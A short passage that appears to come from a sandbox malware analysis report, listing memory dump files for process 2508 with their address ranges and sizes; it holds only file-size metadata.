                                                                          Filesize

                                                                          512KB

                                                                        • memory/2508-12-0x000000001B220000-0x000000001B502000-memory.dmp
                                                                          Filesize

                                                                          2.9MB

                                                                        • memory/2508-40-0x000000001B670000-0x000000001B6A2000-memory.dmp
                                                                          Filesize

                                                                          200KB

                                                                        • memory/2508-41-0x000000001B670000-0x000000001B6A2000-memory.dmp
                                                                          Filesize

                                                                          200KB